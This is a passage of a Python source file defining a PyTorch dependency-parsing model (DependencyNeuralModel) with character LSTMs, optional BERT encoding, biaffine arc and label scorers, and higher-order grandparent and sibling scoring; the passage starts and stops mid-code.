predictions.reshape([num_real_tokens, -1])\n#\n# real_tokens_np = real_tokens.cpu().numpy()\n# shape = [batch_size * max_sentence_length, unroll_steps]\n# padded_output = np.zeros(shape, np.int)\n# padded_output[real_tokens_np] = output\n# padded_output = padded_output.reshape(\n# [batch_size, max_sentence_length, unroll_steps])\n# else:\n# gold_chars2d = gold_chars.reshape(\n# batch_size * max_sentence_length, -1)\n# gold_chars2d = gold_chars2d[real_tokens]\n# gold_lengths1d = gold_lengths.view(-1)[real_tokens]\n# gold_chars2d_eos = self.append_eos(gold_chars2d, gold_lengths1d)\n# self.cached_gold_chars = gold_chars2d_eos\n# self.cached_real_token_inds = real_tokens\n# gold_chars2d = self.prepend_bos(gold_chars2d)\n# embedded_target = self.embeddings(gold_chars2d)\n#\n# # unroll for the number of gold steps.\n# unroll_steps = gold_chars2d.shape[-1]\n#\n# # the decoder returns outputs, states, att distribution and values\n# outputs = self.decoder(\n# embedded_target, encoder_output, encoder_state,\n# mask, unroll_steps)[0]\n#\n# # outputs is a tuple (logits, state, att_distribution, att_sum)\n# logits = outputs[0]\n#\n# # (batch, max_sentence_length, max_predicted_length, vocab_size)\n# padded_output = torch.zeros(\n# batch_size * max_sentence_length, unroll_steps,\n# logits.shape[-1], device=chars.device)\n# padded_output[real_tokens] = logits\n# padded_output = padded_output.reshape(\n# [batch_size, max_sentence_length, unroll_steps, -1])\n#\n# return padded_output\n\n\nclass DependencyNeuralModel(nn.Module):\n def __init__(self,\n model_type,\n token_dictionary,\n fixed_word_embeddings,\n trainable_word_embedding_size=75,\n lemma_embedding_size=0,\n char_embedding_size=250,\n char_hidden_size=400,\n transform_size=125,\n rnn_size=400,\n shared_rnn_layers=2,\n tag_embedding_size=0,\n arc_mlp_size=400,\n label_mlp_size=400,\n ho_mlp_size=200,\n dropout=0.5,\n word_dropout=0.33,\n predict_upos=True,\n predict_xpos=True,\n predict_morph=True,\n predict_lemma=False,\n predict_tree=True,\n tag_mlp_size=0,\n pretrained_name_or_config=None):\n \"\"\"\n :param model_type: a ModelType object\n :param token_dictionary: TokenDictionary object\n :type token_dictionary: TokenDictionary\n :param fixed_word_embeddings: numpy or torch embedding matrix\n (kept fixed), or None\n :param word_dropout: probability of replacing a word with the unknown\n token\n :param pretrained_name_or_config: None, a string (with the pretrained\n BERT model to be used) or a BertConfig instance when loading a pre\n trained parser. If None, no BERT will be used.\n \"\"\"\n super(DependencyNeuralModel, self).__init__()\n self.char_embedding_size = char_embedding_size\n self.char_hidden_size = char_hidden_size\n self.tag_embedding_size = tag_embedding_size\n self.transform_size = transform_size\n self.arc_mlp_size = arc_mlp_size\n self.tag_mlp_size = tag_mlp_size\n self.ho_mlp_size = ho_mlp_size\n self.label_mlp_size = label_mlp_size\n self.dropout_rate = dropout\n self.word_dropout_rate = word_dropout\n self.on_gpu = torch.cuda.is_available()\n self.predict_upos = predict_upos\n self.predict_xpos = predict_xpos\n self.predict_morph = predict_morph\n self.predict_lemma = predict_lemma\n self.predict_tree = predict_tree\n self.predict_tags = predict_upos or predict_xpos or \\\n predict_morph or predict_lemma\n self.model_type = model_type\n self.rnn_size = rnn_size\n\n self.unknown_fixed_word = token_dictionary.get_embedding_id(UNKNOWN)\n self.unknown_trainable_word = token_dictionary.get_form_id(UNKNOWN)\n self.unknown_upos = token_dictionary.get_upos_id(UNKNOWN)\n self.unknown_xpos = token_dictionary.get_xpos_id(UNKNOWN)\n self.unknown_lemma = token_dictionary.get_lemma_id(UNKNOWN)\n morph_alphabets = token_dictionary.morph_tag_alphabets\n self.unknown_morphs = [0] * len(morph_alphabets)\n for i, feature_name in enumerate(morph_alphabets):\n alphabet = morph_alphabets[feature_name]\n self.unknown_morphs[i] = alphabet.lookup(UNKNOWN)\n\n total_encoded_dim = 0\n\n if trainable_word_embedding_size:\n num_words = token_dictionary.get_num_forms()\n self.trainable_word_embeddings = nn.Embedding(\n num_words, trainable_word_embedding_size)\n total_encoded_dim += trainable_word_embedding_size\n else:\n self.trainable_word_embeddings = None\n\n if lemma_embedding_size:\n num_lemmas = token_dictionary.get_num_lemmas()\n self.lemma_embeddings = nn.Embedding(\n num_lemmas, lemma_embedding_size)\n total_encoded_dim += lemma_embedding_size\n else:\n self.lemma_embeddings = None\n\n if tag_embedding_size:\n # only use tag embeddings if there are actual tags, not only special\n # symbols for root, unknown, etc\n num_upos = token_dictionary.get_num_upos_tags()\n if num_upos > len(SPECIAL_SYMBOLS):\n self.upos_embeddings = nn.Embedding(num_upos,\n tag_embedding_size)\n else:\n self.upos_embeddings = None\n\n # also check if UPOS and XPOS are not the same\n num_xpos = token_dictionary.get_num_xpos_tags()\n xpos_tags = token_dictionary.get_xpos_tags()\n upos_tags = token_dictionary.get_upos_tags()\n if num_xpos > len(SPECIAL_SYMBOLS) and \\\n upos_tags != xpos_tags:\n self.xpos_embeddings = nn.Embedding(num_xpos,\n tag_embedding_size)\n else:\n self.xpos_embeddings = None\n\n if self.upos_embeddings is not None or \\\n self.xpos_embeddings is not None:\n # both types of POS embeddings are summed\n total_encoded_dim += tag_embedding_size\n self.morph_embeddings = nn.ModuleList()\n for feature_name in morph_alphabets:\n alphabet = morph_alphabets[feature_name]\n embeddings = nn.Embedding(len(alphabet), tag_embedding_size)\n self.morph_embeddings.append(embeddings)\n total_encoded_dim += tag_embedding_size\n else:\n self.upos_embeddings = None\n self.xpos_embeddings = None\n self.morph_embeddings = None\n\n num_chars = token_dictionary.get_num_characters()\n if self.char_embedding_size:\n self.char_rnn = CharLSTM(\n num_chars, char_embedding_size, char_hidden_size,\n dropout=dropout, bidirectional=False)\n\n if self.transform_size > 0:\n self.char_projection = nn.Linear(\n char_hidden_size, transform_size, bias=False)\n total_encoded_dim += transform_size\n else:\n total_encoded_dim += char_hidden_size\n else:\n self.char_rnn = None\n\n if fixed_word_embeddings is None:\n self.fixed_word_embeddings = None\n else:\n fixed_word_embeddings = torch.tensor(fixed_word_embeddings,\n dtype=torch.float)\n self.fixed_word_embeddings = nn.Embedding.from_pretrained(\n fixed_word_embeddings, freeze=True)\n if self.transform_size > 0:\n self.fixed_embedding_projection = nn.Linear(\n fixed_word_embeddings.shape[1], transform_size, bias=False)\n total_encoded_dim += transform_size\n else:\n total_encoded_dim += fixed_word_embeddings.shape[1]\n\n if pretrained_name_or_config is None:\n self.encoder = None\n elif isinstance(pretrained_name_or_config, BertConfig):\n self.encoder = BertModel(pretrained_name_or_config)\n total_encoded_dim += encoder_dim\n else:\n self.encoder = BertModel.from_pretrained(\n pretrained_name_or_config, output_hidden_states=True)\n total_encoded_dim += encoder_dim\n\n self.dropout_replacement = nn.Parameter(\n torch.randn(total_encoded_dim) / np.sqrt(total_encoded_dim))\n self.dropout = nn.Dropout(dropout)\n self.total_encoded_dim = total_encoded_dim\n\n if shared_rnn_layers > 0 and rnn_size > 0:\n self.shared_rnn = HighwayLSTM(\n total_encoded_dim, rnn_size, shared_rnn_layers,\n self.dropout_rate)\n hidden_dim = 2 * self.rnn_size\n else:\n self.shared_rnn = None\n hidden_dim = total_encoded_dim\n\n # POS and morphology tags\n if self.predict_tags:\n if self.rnn_size > 0:\n self.tagger_rnn = LSTM(\n hidden_dim, self.rnn_size, bidirectional=True)\n tagger_dim = 2 * self.rnn_size\n else:\n self.tagger_rnn = None\n tagger_dim = total_encoded_dim\n\n scorer_dim = tag_mlp_size if tag_mlp_size > 0 else tagger_dim\n\n if predict_upos:\n if tag_mlp_size > 0:\n self.upos_mlp = self._create_mlp(\n tagger_dim, tag_mlp_size, num_layers=1,\n output_activation=nn.ReLU())\n num_tags = token_dictionary.get_num_upos_tags()\n self.upos_scorer = self._create_scorer(scorer_dim, num_tags,\n bias=True)\n if predict_xpos:\n if tag_mlp_size > 0:\n self.xpos_mlp = self._create_mlp(\n tagger_dim, tag_mlp_size, num_layers=1,\n output_activation=nn.ReLU())\n num_tags = token_dictionary.get_num_xpos_tags()\n self.xpos_scorer = self._create_scorer(scorer_dim, num_tags,\n bias=True)\n if predict_morph:\n if tag_mlp_size > 0:\n self.morph_mlp = self._create_mlp(\n tagger_dim, tag_mlp_size, num_layers=1,\n output_activation=nn.ReLU())\n num_tags = token_dictionary.get_num_morph_singletons()\n self.morph_scorer = self._create_scorer(scorer_dim, num_tags,\n bias=True)\n # if predict_lemma:\n # self.lemmatizer = Lemmatizer(\n # num_chars, char_embedding_size, char_hidden_size, dropout,\n # tagger_dim, token_dictionary)\n\n if self.predict_tree:\n if self.rnn_size > 0:\n self.parser_rnn = LSTM(\n hidden_dim, self.rnn_size, bidirectional=True)\n parser_dim = 2 * self.rnn_size\n else:\n self.parser_rnn = None\n parser_dim = hidden_dim\n\n # first order layers\n num_labels = token_dictionary.get_num_deprels()\n self.arc_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, arc_mlp_size, 1, dropout=dropout)\n self.label_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, label_mlp_size,\n num_labels, dropout=dropout)\n self.linearization_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, arc_mlp_size, 1, dropout=dropout)\n self.distance_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, arc_mlp_size, 1, dropout=dropout)\n\n # Higher order layers\n if model_type.grandparents:\n self.gp_grandparent_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gp_head_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gp_modifier_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gp_coeff = self._create_parameter_tensor([3], 1.)\n self.grandparent_scorer = self._create_scorer(self.ho_mlp_size)\n\n if model_type.consecutive_siblings:\n self.sib_head_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.sib_modifier_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.sib_sibling_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.sib_coeff = self._create_parameter_tensor([3], 1.)\n self.sibling_scorer = self._create_scorer(self.ho_mlp_size)\n\n if model_type.consecutive_siblings or model_type.grandsiblings \\\n or model_type.trisiblings or model_type.arbitrary_siblings:\n self.null_sibling_tensor = self._create_parameter_tensor(\n parser_dim)\n\n if model_type.grandsiblings:\n self.gsib_head_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_modifier_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_sibling_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_grandparent_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_coeff = self._create_parameter_tensor([3], 1.)\n self.grandsibling_scorer = self._create_scorer(self.ho_mlp_size)\n\n # Clear out the gradients before the next batch.\n self.zero_grad()\n\n def extra_repr(self) -> str:\n dim = self.dropout_replacement.shape[0]\n return '(dropout_replacement): Tensor(%d)' % dim\n\n def _create_parameter_tensor(self, shape, value=None):\n \"\"\"\n Create a tensor for representing some special token. It is included in\n the model parameters.\n \"\"\"\n if value is None:\n tensor = torch.randn(shape) / np.sqrt(shape)\n else:\n tensor = torch.full(shape, value)\n if self.on_gpu:\n tensor = tensor.cuda()\n \n parameter = nn.Parameter(tensor)\n\n return parameter\n\n def _create_scorer(self, input_size=None, output_size=1, bias=False):\n \"\"\"\n Create the weights for scoring a given tensor representation to a\n single number.\n\n :param input_size: expected input size. If None, arc_mlp_size\n is used.\n :return: an nn.Linear object\n \"\"\"\n if input_size is None:\n input_size = self.arc_mlp_size\n linear = nn.Linear(input_size, output_size, bias=bias)\n scorer = nn.Sequential(self.dropout, linear)\n\n return scorer\n\n def _create_mlp(self, input_size=None, hidden_size=None, num_layers=1,\n output_activation=None):\n \"\"\"\n Create the weights for a fully connected subnetwork.\n\n The output has a linear activation; if num_layers > 1, hidden layers\n will use a non-linearity. If output_activation is given, it will be\n applied to the output.\n\n The first layer will have a weight matrix (input x hidden), subsequent\n layers will be (hidden x hidden).\n\n :param input_size: if not given, will be assumed rnn_size * 2\n :param hidden_size: if not given, will be assumed arc_mlp_size\n :param num_layers: number of hidden layers (including the last one). If\n not given, will be mlp_layers\n :return: an nn.Linear object, mapping an input with 2*hidden_units\n to hidden_units.\n \"\"\"\n if input_size is None:\n input_size = self.total_encoded_dim\n if hidden_size is None:\n hidden_size = self.arc_mlp_size\n\n layers = []\n for i in range(num_layers):\n if i > 0:\n layers.append(torch.relu)\n\n linear = nn.Linear(input_size, hidden_size)\n layers.extend([self.dropout, linear])\n input_size = hidden_size\n\n if output_activation is not None:\n layers.append(output_activation)\n\n mlp = nn.Sequential(*layers)\n return mlp\n\n def save(self, file):\n torch.save(self.state_dict(), file)\n\n def create_metadata(self) -> dict:\n \"\"\"\n Return a dictionary with metadata needed to reconstruct a serialized\n model.\n \"\"\"\n if self.fixed_word_embeddings is None:\n vocab, dim = 0, 0\n else:\n vocab, dim = self.fixed_word_embeddings.weight.shape\n if self.encoder is None:\n data = {}\n else:\n bert_config = self.encoder.config\n data = bert_config.to_dict()\n\n data['fixed_embedding_vocabulary'] = vocab\n data['fixed_embedding_size'] = dim\n\n return data\n\n @classmethod\n def load(cls, torch_file, options, token_dictionary, metadata):\n fixed_embedding_vocab_size = metadata['fixed_embedding_vocabulary']\n fixed_embedding_size = metadata['fixed_embedding_size']\n lemma_embedding_size = options.lemma_embedding_size\n char_embedding_size = options.char_embedding_size\n trainable_embedding_size = options.embedding_size\n tag_embedding_size = options.tag_embedding_size\n char_hidden_size = options.char_hidden_size\n transform_size = options.transform_size\n rnn_size = options.rnn_size\n shared_layers = options.rnn_layers\n arc_mlp_size = options.arc_mlp_size\n tag_mlp_size = options.tag_mlp_size\n label_mlp_size = options.label_mlp_size\n ho_mlp_size = options.ho_mlp_size\n dropout = options.dropout\n word_dropout = options.word_dropout\n predict_upos = options.upos\n predict_xpos = options.xpos\n predict_morph = options.morph\n predict_lemma = options.lemma\n predict_tree = options.parse\n model_type = options.model_type\n\n if fixed_embedding_vocab_size > 0:\n dummy_embeddings = np.empty([fixed_embedding_vocab_size,\n fixed_embedding_size], np.float32)\n else:\n dummy_embeddings = None\n\n if options.bert_model is None:\n config = None\n else:\n config = BertConfig.from_dict(metadata)\n\n model = DependencyNeuralModel(\n model_type, token_dictionary, dummy_embeddings,\n trainable_embedding_size,\n lemma_embedding_size,\n char_embedding_size,\n tag_embedding_size=tag_embedding_size,\n char_hidden_size=char_hidden_size,\n transform_size=transform_size,\n rnn_size=rnn_size,\n shared_rnn_layers=shared_layers,\n arc_mlp_size=arc_mlp_size,\n tag_mlp_size=tag_mlp_size,\n label_mlp_size=label_mlp_size,\n ho_mlp_size=ho_mlp_size,\n dropout=dropout,\n word_dropout=word_dropout,\n predict_upos=predict_upos, predict_xpos=predict_xpos,\n predict_morph=predict_morph, predict_lemma=predict_lemma,\n predict_tree=predict_tree, pretrained_name_or_config=config)\n\n if model.on_gpu:\n state_dict = torch.load(torch_file)\n else:\n state_dict = torch.load(torch_file, map_location='cpu')\n\n # kind of a hack to allow compatibility with previous versions\n own_state_dict = model.state_dict()\n pretrained_dict = {k: v for k, v in state_dict.items() if\n k in own_state_dict}\n own_state_dict.update(pretrained_dict)\n model.load_state_dict(own_state_dict)\n\n return model\n\n def _compute_arc_scores(self, states, lengths, normalization):\n \"\"\"\n Compute the first order scores and store them in the appropriate\n position in the `scores` tensor.\n\n The score matrices have shape (modifer, head), and do not have the row\n corresponding to the root as a modifier. Thus they have shape\n (num_words - 1, num_words).\n\n :param states: hidden states returned by the RNN; one for each word\n :param lengths: length of each sentence in the batch (including root)\n :param normalization: 'global' or 'local'\n \"\"\"\n batch_size, max_sent_size, _ = states.size()\n\n # apply dropout separately to get different masks\n # head_scores is interpreted as (batch, modifier, head)\n head_scores = self.arc_scorer(self.dropout(states),\n self.dropout(states)).squeeze(3)\n s1 = self.dropout(states)\n s2 = self.dropout(states)\n label_scores = self.label_scorer(s1, s2)\n\n if normalization == ParsingObjective.LOCAL:\n # set arc scores from each word to itself as -inf\n # structured models don't need it as these arcs are never predicted\n diag = torch.eye(max_sent_size, device=states.device).bool()\n diag = diag.unsqueeze(0)\n head_scores.masked_fill_(diag, -np.inf)\n\n # set padding head scores to -inf\n # during training, label loss is computed with respect to the gold\n # arcs, so there's no need to set -inf scores to invalid positions\n # in label scores.\n padding_mask = create_padding_mask(lengths)\n head_scores = head_scores.masked_fill(padding_mask.unsqueeze(1),\n -np.inf)\n\n if self.training and normalization == ParsingObjective.GLOBAL_MARGIN:\n dev = head_scores.device\n head_scores += gumbel.sample(head_scores.shape).to(dev)\n label_scores += gumbel.sample(label_scores.shape).to(dev)\n\n # linearization (scoring heads after/before modifier)\n arange = torch.arange(max_sent_size, device=states.device)\n position1 = arange.view(1, 1, -1).expand(batch_size, -1, -1)\n position2 = arange.view(1, -1, 1).expand(batch_size, -1, -1)\n head_offset = position1 - position2\n sign_scores = self.linearization_scorer(self.dropout(states),\n self.dropout(states)).squeeze(3)\n sign_sigmoid = F.logsigmoid(\n sign_scores * torch.sign(head_offset).float()).detach()\n head_scores += sign_sigmoid\n\n # score distances between head and modifier\n dist_scores = self.distance_scorer(self.dropout(states),\n self.dropout(states)).squeeze(3)\n dist_pred = 1 + F.softplus(dist_scores)\n dist_target = torch.abs(head_offset)\n\n # KL divergence between predicted distances and actual ones\n dist_kld = -torch.log((dist_target.float() - dist_pred) ** 2 / 2 + 1)\n head_scores += dist_kld.detach()\n\n # exclude attachment for the root symbol\n head_scores = head_scores[:, 1:]\n label_scores = label_scores[:, 1:]\n sign_scores = sign_scores[:, 1:]\n dist_kld = dist_kld[:, 1:]\n\n self.scores[Target.HEADS] = head_scores\n self.scores[Target.RELATIONS] = label_scores\n self.scores[Target.SIGN] = sign_scores\n self.scores[Target.DISTANCE] = dist_kld\n\n def _compute_grandparent_scores(self, states, parts):\n \"\"\"`\n Compute the grandparent scores and store them in the\n appropriate position in the `scores` tensor.\n\n :param states: hidden states returned by the RNN; one for each word\n :param parts: a DependencyParts object containing the parts to be scored\n :type parts: DependencyParts\n \"\"\"\n # there may be no grandparent parts in some cases\n if parts.get_num_type(Target.GRANDPARENTS) == 0:\n empty = torch.tensor([], device=states.device)\n self.scores[Target.GRANDPARENTS].append(empty)\n return\n\n head_tensors = self.gp_head_mlp(states)\n grandparent_tensors = self.gp_grandparent_mlp(states)\n modifier_tensors = self.gp_modifier_mlp(states)\n\n head_indices = []\n modifier_indices = []\n grandparent_indices = []\n\n for part in parts.part_lists[Target.GRANDPARENTS]:\n # list all indices, then feed the corresponding tensors to the net\n head_indices.append(part.head)\n modifier_indices.append(part.modifier)\n grandparent_indices.append(part.grandparent)\n\n heads = head_tensors[head_indices]\n modifiers = modifier_tensors[modifier_indices]\n grandparents = grandparent_tensors[grandparent_indices]\n\n # we don't have H+M because those are already encoded in the arcs\n c = self.gp_coeff\n states_mg = c[0] * torch.tanh(modifiers + grandparents)\n states_hg = c[1] * torch.tanh(heads + grandparents)\n states_hmg = c[2] * torch.tanh(heads + modifiers + grandparents)\n final_states = states_mg + states_hg + states_hmg\n part_scores = self.grandparent_scorer(final_states)\n\n self.scores[Target.GRANDPARENTS].append(part_scores.view(-1))\n\n def _compute_consecutive_sibling_scores(self, states, parts):\n \"\"\"\n Compute the consecutive sibling scores and store them in the\n appropriate position in the `scores` tensor.\n\n :param states: hidden states returned by the RNN; one for each word\n :param parts: a DependencyParts object containing the parts to be scored\n :type parts: DependencyParts\n \"\"\"\n # include the vector for null sibling\n # word_sibling_tensors is (num_words=1, hidden_units)\n states_and_sibling = torch.cat([states,\n self.null_sibling_tensor.view(1, -1)])\n\n head_tensors = self.sib_head_mlp(states)\n modifier_tensors = self.sib_modifier_mlp(states)\n sibling_tensors = self.sib_sibling_mlp(states_and_sibling)\n\n head_indices = []\n modifier_indices = []\n sibling_indices = []\n\n for part in parts.part_lists[Target.NEXT_SIBLINGS]:\n # list all indices to the candidate head/modifier/siblings, then\n # process them all at once for faster execution.\n head_indices.append(part.head)\n modifier_indices.append(part.modifier)\n if part.sibling == 0:\n # sibling == 0 or -1 indicates there's no sibling to the left\n # (to the right, sibling == len(states))\n sibling_indices.append(len(states))\n else:\n sibling_indices.append(part.sibling)\n\n heads = head_tensors[head_indices]\n modifiers = modifier_tensors[modifier_indices]\n siblings = sibling_tensors[sibling_indices]\n\n # we don't have H+M because those are already encoded in the arcs\n c = self.sib_coeff\n states_hs = c[0] * torch.tanh(heads + siblings)\n states_ms = c[1] * torch.tanh(modifiers + siblings)\n states_hms = c[2] * torch.tanh(heads + modifiers + siblings)\n final_states = states_hs + states_ms + states_hms\n\n sibling_scores = self.sibling_scorer(final_states)\n\n self.scores[Target.NEXT_SIBLINGS].append(sibling_scores.view(-1))\n\n def _compute_grandsibling_scores(self, states, parts):\n \"\"\"\n Compute the consecutive grandsibling scores and store them in the\n appropriate position in the `scores` tensor.\n\n :param states: hidden states returned by the RNN; one for each word\n :param parts: a DependencyParts object containing the parts to be scored\n :type parts: DependencyParts\n \"\"\"\n # include the vector for null sibling\n # word_sibling_tensors is (num_words=1, hidden_units)\n states_and_sibling = torch.cat([states,\n self.null_sibling_tensor.view(1, -1)])\n\n head_tensors = self.gsib_head_mlp(states)\n modifier_tensors = self.gsib_modifier_mlp(states)\n sibling_tensors = self.gsib_sibling_mlp(states_and_sibling)\n grandparent_tensors = self.gsib_grandparent_mlp(states)\n\n head_indices = []\n modifier_indices = []\n sibling_indices = []\n grandparent_indices = []\n\n for part in parts.part_lists[Target.GRANDSIBLINGS]:\n # list all indices to the candidate head/mod/sib/grandparent\n head_indices.append(part.head)\n modifier_indices.append(part.modifier)\n grandparent_indices.append(part.grandparent)\n if part.sibling == 0:\n # sibling == 0 or -1 indicates there's no sibling to the left\n # (to the right, sibling == len(states))\n sibling_indices.append(len(states))\n else:\n sibling_indices.append(part.sibling)\n\n heads = head_tensors[head_indices]\n modifiers = modifier_tensors[modifier_indices]\n siblings = sibling_tensors[sibling_indices]\n grandparents = grandparent_tensors[grandparent_indices]\n\n c = self.gsib_coeff\n states_hsg = c[0] * torch.tanh(heads + siblings + grandparents)\n states_msg = c[1] * torch.tanh(modifiers + siblings + grandparents)\n states_hmsg = c[2] * torch.tanh(\n heads + modifiers + siblings + grandparents)\n gsib_states = states_hsg + states_msg + states_hmsg\n gsib_scores = self.grandsibling_scorer(gsib_states)\n\n self.scores[Target.GRANDSIBLINGS].append(gsib_scores.view(-1))\n\n def _get_bert_representations(self, instances, max_num_tokens):\n \"\"\"\n Get BERT encoded representations for the instances\n\n :return: a tensor (batch, max_num_tokens, encoder_dim)\n \"\"\"\n batch_size = len(instances)\n # word piece lengths\n wp_lengths = torch.tensor([len(inst.bert_ids) for inst in instances],\n dtype=torch.long)\n if self.on_gpu:\n wp_lengths = wp_lengths.cuda()\n max_length = wp_lengths.max()\n indices = torch.zeros([batch_size, max_length], dtype=torch.long,\n device=wp_lengths.device)\n\n # this contains the indices of the first word piece of real tokens.\n # positions past the sequence size will have 0's and will be ignored\n # afterwards anyway (treated as padding)\n real_indices = torch.zeros([batch_size, max_num_tokens],\n dtype=torch.long, device=wp_lengths.device)\n for i, inst in enumerate(instances):\n inst_length = wp_lengths[i]\n indices[i, :inst_length] = torch.tensor(\n inst.bert_ids, device=indices.device)\n\n # instance length is not the same as wordpiece length!\n # start from 1, because 0 will point to CLS as the root symbol\n real_indices[i, 1:len(inst)] = torch.tensor(\n inst.bert_token_starts, device=indices.device) + 1\n\n ones = torch.ones_like(indices)\n mask = ones.cumsum(1) <= wp_lengths.unsqueeze(1)\n\n if max_length > max_encoder_length:\n # if there are more tokens than the encoder can handle, break them\n # in smaller sequences.\n quarter_max = max_encoder_length // 4\n partial_encoded = []\n\n # possibly not all samples in the batch have the same length, but\n # even more likely one single huge sentence has the batch for itself\n ind_splits = torch.split(indices, quarter_max, 1)\n mask_splits = torch.split(mask, quarter_max, 1)\n\n for i in range(0, len(ind_splits) - 2, 2):\n # run the inputs through the encoder with at least a quarter of\n # context before and after\n partial_inds = torch.cat(ind_splits[i:i + 4], 1)\n partial_mask = torch.cat(mask_splits[i:i + 4], 1)\n\n # partial_hidden is a tuple of embeddings and hidden layers\n _, _, partial_hidden = self.encoder(partial_inds, partial_mask)\n\n last_states = torch.stack(partial_hidden[-4:])\n if i == 0:\n # include the first quarter\n last_states = last_states[:, :, :3 * quarter_max]\n elif i + 4 >= len(ind_splits):\n # include the last quarter\n last_states = last_states[:, :, quarter_max:]\n else:\n # only take the middle two quarters\n last_states = last_states[:, :, quarter_max:-quarter_max]\n\n partial_encoded.append(last_states.mean(0))\n\n encoded = torch.cat(partial_encoded, 1)\n else:\n # hidden is a tuple of embeddings and hidden layers\n _, _, hidden = self.encoder(indices, mask)\n\n # TODO: use a better aggregation scheme\n last_states = torch.stack(hidden[-4:])\n encoded = last_states.mean(0)\n\n # get the first wordpiece for tokens that were split, and CLS for root\n r = torch.arange(batch_size, device=encoded.device).unsqueeze(1)\n encoded = encoded[r, real_indices]\n\n return encoded\n\n def get_word_representations(self, instances, max_length, char_indices,\n token_lengths):\n \"\"\"\n Get the full embedding representations of words in the batch, including\n word type embeddings, char level and POS tag embeddings.\n\n :param instances: list of instance objects\n :param max_length: length of the longest instance in the batch\n :return: a tensor with shape (batch, max_num_tokens, embedding_size)\n \"\"\"\n all_embeddings = []\n\n if self.trainable_word_embeddings is not None:\n trainable_embeddings = self._get_embeddings(instances, max_length,\n 'trainableword')\n all_embeddings.append(trainable_embeddings)\n\n if self.encoder is not None:\n bert_embeddings = self._get_bert_representations(instances,\n max_length)\n all_embeddings.append(bert_embeddings)\n\n if self.fixed_word_embeddings is not None:\n word_embeddings = self._get_embeddings(\n instances, max_length, 'fixedword')\n if self.transform_size > 0:\n word_embeddings = self.fixed_embedding_projection(\n word_embeddings)\n all_embeddings.append(word_embeddings)\n\n if self.lemma_embeddings is not None:\n lemma_embeddings = self._get_embeddings(instances, max_length,\n 'lemma')\n all_embeddings.append(lemma_embeddings)\n\n upos = 0 if self.upos_embeddings is None \\\n else self._get_embeddings(instances, max_length, 'upos')\n xpos = 0 if self.xpos_embeddings is None \\\n else self._get_embeddings(instances, max_length, 'xpos')\n pos_embeddings = upos + xpos\n if pos_embeddings is not 0:\n all_embeddings.append(pos_embeddings)\n\n if self.morph_embeddings is not None:\n morph_embeddings = self._get_embeddings(instances, max_length,\n 'morph')\n all_embeddings.append(morph_embeddings)\n\n if self.char_rnn is not None:\n char_embeddings = self.char_rnn(char_indices, token_lengths)\n if self.transform_size > 0:\n dropped = self.dropout(char_embeddings)\n char_embeddings = self.char_projection(dropped)\n all_embeddings.append(char_embeddings)\n\n # each embedding tensor is (batch, num_tokens, embedding_size)\n embeddings = torch.cat(all_embeddings, dim=2)\n\n if self.word_dropout_rate:\n if self.training:\n # apply word dropout -- replace by a random tensor\n dropout_draw = torch.rand_like(embeddings[:, :, 0])\n inds = dropout_draw < self.word_dropout_rate\n embeddings[inds] = self.dropout_replacement\n else:\n # weight embeddings by the training dropout rate\n embeddings *= (1 - self.word_dropout_rate)\n embeddings += self.word_dropout_rate * self.dropout_replacement\n\n return embeddings\n\n def _get_embeddings(self, instances, max_length, type_):\n \"\"\"\n Get the word or tag embeddings for all tokens in the instances.\n\n This function takes care of padding.\n\n :param type_: 'fixedword', 'trainableword', 'upos' or 'xpos'\n :param max_length: length of the longest instance\n :return: a tensor with shape (batch, sequence, embedding size)\n \"\"\"\n if type_ == 'morph':\n # morph features have multiple embeddings (one for each feature)\n num_features = len(self.morph_embeddings)\n shape = (len(instances), max_length, num_features)\n index_tensor = torch.zeros(\n shape, dtype=torch.long,\n device=self.morph_embeddings[0].weight.device)\n\n for i, instance in enumerate(instances):\n indices = instance.get_all_morph_tags()\n index_tensor[i, :len(instance)] = torch.tensor(indices)\n\n embedding_sum = 0\n for i, matrix in enumerate(self.morph_embeddings):\n indices = index_tensor[:, :, i]\n\n # embeddings is (batch, max_length, num_units)\n embeddings = matrix(indices)\n embedding_sum = embedding_sum + embeddings\n\n return embedding_sum\n\n shape = (len(instances), max_length)\n index_matrix = torch.zeros(shape, dtype=torch.long)\n for i, instance in enumerate(instances):\n if type_ == 'fixedword':\n indices = instance.get_all_embedding_ids()\n elif type_ == 'trainableword':\n indices = instance.get_all_forms()\n elif type_ == 'lemma':\n indices = instance.get_all_lemmas()\n elif type_ == 'upos':\n indices = instance.get_all_upos()\n elif type_ == 'xpos':\n indices = instance.get_all_xpos()\n else:\n raise ValueError('Invalid embedding type: %s' % type_)\n\n index_matrix[i, :len(instance)] = torch.tensor(indices)\n\n if type_ == 'fixedword':\n embedding_matrix = self.fixed_word_embeddings\n elif type_ == 'trainableword':\n embedding_matrix = self.trainable_word_embeddings\n elif type_ == 'lemma':\n embedding_matrix = self.lemma_embeddings\n else:\n if type_ == 'upos':\n embedding_matrix = self.upos_embeddings\n else:\n embedding_matrix = self.xpos_embeddings\n\n if self.on_gpu:\n index_matrix = index_matrix.cuda()\n\n embeddings = embedding_matrix(index_matrix)\n return embeddings\n\n def _convert_arc_scores_to_parts(self, instances, parts):\n \"\"\"\n Convert the stored matrices with arc scores and label scores to 1d\n arrays, in the same order as in parts. Masks are also applied.\n\n :param instances: list of DependencyInstanceNumeric\n :param parts: a DependencyParts object\n \"\"\"\n new_head_scores = []\n new_label_scores = []\n\n # arc_mask has shape (head, modifier) but scores are\n # (modifier, head); so we transpose\n all_head_scores = torch.transpose(self.scores[Target.HEADS], 1, 2)\n all_label_scores = torch.transpose(self.scores[Target.RELATIONS], 1, 2)\n\n for i, instance in enumerate(instances):\n inst_parts = parts[i]\n mask = inst_parts.arc_mask\n mask = torch.tensor(mask.astype(np.bool))\n length = len(instance)\n\n # get a matrix [inst_length, 